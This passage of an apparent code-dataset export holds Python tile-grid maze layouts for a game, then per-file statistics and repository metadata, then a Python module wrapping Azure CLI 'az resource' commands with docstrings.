[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
# Uniform 24x40 grid filled with tile code 3 (presumably a blank/placeholder
# tile — TODO confirm against the renderer). Each row is a distinct list so
# in-place edits to one row never affect another.
blank = [[3] * 40 for _ in range(24)]
# Uniform 24x40 grid filled with tile code 1 (presumably solid wall — TODO
# confirm against the renderer). Each row is a distinct list so in-place
# edits to one row never affect another.
filled = [[1] * 40 for _ in range(24)]
# 24x40 tile grid: a maze layout with 2-tile-wide corridors and doorways on
# all four edges. Tile codes appear to be 1 = wall, 0 = open floor — TODO
# confirm against the renderer.
maze1 = [[1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
# 24x40 tile grid: a second maze layout with 2-tile-wide corridors and
# doorways on all four edges. Tile codes appear to be 1 = wall, 0 = open
# floor — TODO confirm against the renderer.
maze2 = [[1,1,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,1,1],
[0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,1,1,1,1],
[0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,1],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0],
[1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,1,1,1,1,1,1]]
# 24x40 tile grid (presumably 1 = wall, 0 = open floor — TODO confirm):
# top edge has an 8-tile doorway, the 20 interior rows are fully open
# (hallway variant), and the bottom edge is solid. Comprehensions produce
# a fresh list per row, matching the original literal's independent rows.
openTopHall = (
    [[1] * 16 + [0] * 8 + [1] * 16 for _ in range(2)]  # top wall with doorway
    + [[0] * 40 for _ in range(20)]                    # fully open interior
    + [[1] * 40 for _ in range(2)]                     # solid bottom wall
)
# 24x40 tile grid (presumably 1 = wall, 0 = open floor — TODO confirm):
# top edge has an 8-tile doorway, the interior is an open room bordered by
# 2-tile side walls, and the bottom edge is solid. Comprehensions produce
# a fresh list per row, matching the original literal's independent rows.
openTop = (
    [[1] * 16 + [0] * 8 + [1] * 16 for _ in range(2)]  # top wall with doorway
    + [[1, 1] + [0] * 36 + [1, 1] for _ in range(20)]  # walled open interior
    + [[1] * 40 for _ in range(2)]                     # solid bottom wall
)
# 24x40 tile grid (presumably 1 = wall, 0 = open floor — TODO confirm):
# mirror of openTop — solid top edge, walled open interior, and an 8-tile
# doorway in the bottom edge. Comprehensions produce a fresh list per row,
# matching the original literal's independent rows.
openBot = (
    [[1] * 40 for _ in range(2)]                       # solid top wall
    + [[1, 1] + [0] * 36 + [1, 1] for _ in range(20)]  # walled open interior
    + [[1] * 16 + [0] * 8 + [1] * 16 for _ in range(2)]  # bottom wall with doorway
)
# 24x40 tile grid (presumably 1 = wall, 0 = open floor — TODO confirm):
# mirror of openTopHall — solid top edge, fully open interior (hallway
# variant), and an 8-tile doorway in the bottom edge. Comprehensions
# produce a fresh list per row, matching the original's independent rows.
openBotHall = (
    [[1] * 40 for _ in range(2)]                         # solid top wall
    + [[0] * 40 for _ in range(20)]                      # fully open interior
    + [[1] * 16 + [0] * 8 + [1] * 16 for _ in range(2)]  # bottom wall with doorway
)
""" [[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]]
"""
| 86.845238
| 97
| 0.442129
| 9,612
| 21,885
| 1.006658
| 0.001561
| 1.034312
| 1.449773
| 1.855312
| 0.992146
| 0.992146
| 0.992146
| 0.992146
| 0.992146
| 0.992146
| 0
| 0.485795
| 0.096093
| 21,885
| 252
| 98
| 86.845238
| 0.003336
| 0.000685
| 0
| 0.930556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
142745156023a2dec6586b6ac306c21912cfd8de
| 12,846
|
py
|
Python
|
pyaz/resource/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/resource/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/resource/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
'''
Manage Azure resources.
'''
from .. pyaz_utils import _call_az
from . import link, lock
def create(properties, api_version=None, id=None, is_full_object=None, latest_include_preview=None, location=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None):
    '''
    Create a resource.

    Required Parameters:
    - properties -- a JSON-formatted string containing resource properties

    Optional Parameters:
    - api_version -- The api version of the resource (omit for the latest stable version)
    - id -- Resource ID.
    - is_full_object -- Indicate that the properties object includes other options such as location, tags, sku, and/or plan.
    - latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
    - location -- Location. Values from: `az account list-locations`. You can configure the default location using `az configure --defaults location=<location>`.
    - name -- The resource name. (Ex: myC)
    - namespace -- Provider namespace (Ex: 'Microsoft.Provider')
    - parent -- The parent path (Ex: 'resA/myA/resB/myB')
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
    '''
    # locals() is exactly the argument dict forwarded to the az CLI; adding
    # any local variable to this function would leak it into the CLI call.
    return _call_az("az resource create", locals())
def delete(api_version=None, ids=None, latest_include_preview=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None):
    '''
    Delete a resource.

    Optional Parameters:
    - api_version -- The api version of the resource (omit for the latest stable version)
    - ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
    - latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
    - name -- The resource name. (Ex: myC)
    - namespace -- Provider namespace (Ex: 'Microsoft.Provider')
    - parent -- The parent path (Ex: 'resA/myA/resB/myB')
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
    '''
    # locals() is exactly the argument dict forwarded to the az CLI; adding
    # any local variable to this function would leak it into the CLI call.
    return _call_az("az resource delete", locals())
def show(api_version=None, ids=None, include_response_body=None, latest_include_preview=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None):
    '''
    Get the details of a resource.

    Optional Parameters:
    - api_version -- The api version of the resource (omit for the latest stable version)
    - ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
    - include_response_body -- Use if the default command output doesn't capture all of the property data.
    - latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
    - name -- The resource name. (Ex: myC)
    - namespace -- Provider namespace (Ex: 'Microsoft.Provider')
    - parent -- The parent path (Ex: 'resA/myA/resB/myB')
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
    '''
    # locals() is exactly the argument dict forwarded to the az CLI; adding
    # any local variable to this function would leak it into the CLI call.
    return _call_az("az resource show", locals())
def list(location=None, name=None, namespace=None, resource_group=None, resource_type=None, tag=None):
    # NOTE: the name intentionally shadows the builtin `list` — it mirrors
    # the `az resource list` subcommand and is part of the public API.
    '''
    List resources.

    Optional Parameters:
    - location -- Location. Values from: `az account list-locations`. You can configure the default location using `az configure --defaults location=<location>`.
    - name -- The resource name. (Ex: myC)
    - namespace -- Provider namespace (Ex: 'Microsoft.Provider')
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
    - tag -- a single tag in 'key[=value]' format. Use '' to clear existing tags.
    '''
    # locals() is exactly the argument dict forwarded to the az CLI; adding
    # any local variable to this function would leak it into the CLI call.
    return _call_az("az resource list", locals())
def tag(tags, api_version=None, ids=None, is_incremental=None, latest_include_preview=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None):
    '''
    Tag a resource.

    Required Parameters:
    - tags -- space-separated tags: key[=value] [key[=value] ...]. Use '' to clear existing tags.

    Optional Parameters:
    - api_version -- The api version of the resource (omit for the latest stable version)
    - ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
    - is_incremental -- The option to add tags incrementally without deleting the original tags. If the key of new tag and original tag are duplicated, the original value will be overwritten.
    - latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
    - name -- The resource name. (Ex: myC)
    - namespace -- Provider namespace (Ex: 'Microsoft.Provider')
    - parent -- The parent path (Ex: 'resA/myA/resB/myB')
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
    '''
    # locals() is exactly the argument dict forwarded to the az CLI; adding
    # any local variable to this function would leak it into the CLI call.
    return _call_az("az resource tag", locals())
def move(destination_group, ids, destination_subscription_id=None):
    '''
    Move resources to another resource group (and optionally subscription).

    Required Parameters:
    - destination_group -- the destination resource group name
    - ids -- the space-separated resource ids to be moved

    Optional Parameters:
    - destination_subscription_id -- the destination subscription identifier
    '''
    # locals() is exactly the argument dict forwarded to the az CLI; adding
    # any local variable to this function would leak it into the CLI call.
    return _call_az("az resource move", locals())
def invoke_action(action, api_version=None, ids=None, latest_include_preview=None, name=None, namespace=None, parent=None, request_body=None, resource_group=None, resource_type=None):
    '''
    Invoke an action on the resource.

    Required Parameters:
    - action -- The action that will be invoked on the specified resource

    Optional Parameters:
    - api_version -- The api version of the resource (omit for the latest stable version)
    - ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
    - latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
    - name -- The resource name. (Ex: myC)
    - namespace -- Provider namespace (Ex: 'Microsoft.Provider')
    - parent -- The parent path (Ex: 'resA/myA/resB/myB')
    - request_body -- JSON encoded parameter arguments for the action that will be passed along in the post request body. Use @{file} to load from a file.
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
    '''
    # locals() is exactly the argument dict forwarded to the az CLI; adding
    # any local variable to this function would leak it into the CLI call.
    return _call_az("az resource invoke-action", locals())
def update(add=None, api_version=None, force_string=None, ids=None, include_response_body=None, latest_include_preview=None, name=None, namespace=None, parent=None, remove=None, resource_group=None, resource_type=None, set=None):
    # NOTE: the `set` parameter intentionally shadows the builtin — it mirrors
    # the az CLI's --set flag and is part of the public API.
    '''
    Update a resource.

    Optional Parameters:
    - add -- Add an object to a list of objects by specifying a path and key value pairs. Example: --add property.listProperty <key=value, string or JSON string>
    - api_version -- The api version of the resource (omit for the latest stable version)
    - force_string -- When using 'set' or 'add', preserve string literals instead of attempting to convert to JSON.
    - ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
    - include_response_body -- Use if the default command output doesn't capture all of the property data.
    - latest_include_preview -- Indicate that the latest api-version will be used regardless of whether it is preview version (like 2020-01-01-preview) or not. For example, if the supported api-version of resource provider is 2020-01-01-preview and 2019-01-01: when passing in this parameter it will take the latest version 2020-01-01-preview, otherwise it will take the latest stable version 2019-01-01 without passing in this parameter
    - name -- The resource name. (Ex: myC)
    - namespace -- Provider namespace (Ex: 'Microsoft.Provider')
    - parent -- The parent path (Ex: 'resA/myA/resB/myB')
    - remove -- Remove a property or an element from a list. Example: --remove property.list <indexToRemove> OR --remove propertyToRemove
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
    - set -- Update an object by specifying a property path and value to set. Example: --set property1.property2=<value>
    '''
    # locals() is exactly the argument dict forwarded to the az CLI; adding
    # any local variable to this function would leak it into the CLI call.
    return _call_az("az resource update", locals())
def wait(api_version=None, created=None, custom=None, deleted=None, exists=None, ids=None, include_response_body=None, interval=None, name=None, namespace=None, parent=None, resource_group=None, resource_type=None, timeout=None, updated=None):
    '''
    Place the CLI in a waiting state until a condition of a resources is met.

    Thin generated wrapper: forwards every keyword argument to the Azure CLI
    command ``az resource wait`` via ``locals()``.  NOTE: do not introduce
    any local variable in this body -- ``locals()`` would capture it and it
    would be forwarded to ``_call_az`` as if it were a CLI parameter.

    Optional Parameters:
    - api_version -- The api version of the resource (omit for the latest stable version)
    - created -- wait until created with 'provisioningState' at 'Succeeded'
    - custom -- Wait until the condition satisfies a custom JMESPath query. E.g. provisioningState!='InProgress', instanceView.statuses[?code=='PowerState/running']
    - deleted -- wait until deleted
    - exists -- wait until the resource exists
    - ids -- One or more resource IDs (space-delimited). If provided, no other "Resource Id" arguments should be specified.
    - include_response_body -- Use if the default command output doesn't capture all of the property data.
    - interval -- polling interval in seconds
    - name -- The resource name. (Ex: myC)
    - namespace -- Provider namespace (Ex: 'Microsoft.Provider')
    - parent -- The parent path (Ex: 'resA/myA/resB/myB')
    - resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
    - resource_type -- The resource type (Ex: 'resC'). Can also accept namespace/type format (Ex: 'Microsoft.Provider/resC')
    - timeout -- maximum wait in seconds
    - updated -- wait until updated with provisioningState at 'Succeeded'
    '''
    return _call_az("az resource wait", locals())
| 70.972376
| 437
| 0.731823
| 1,850
| 12,846
| 5.016757
| 0.116216
| 0.035557
| 0.015516
| 0.029092
| 0.765543
| 0.740868
| 0.736882
| 0.725245
| 0.720612
| 0.720612
| 0
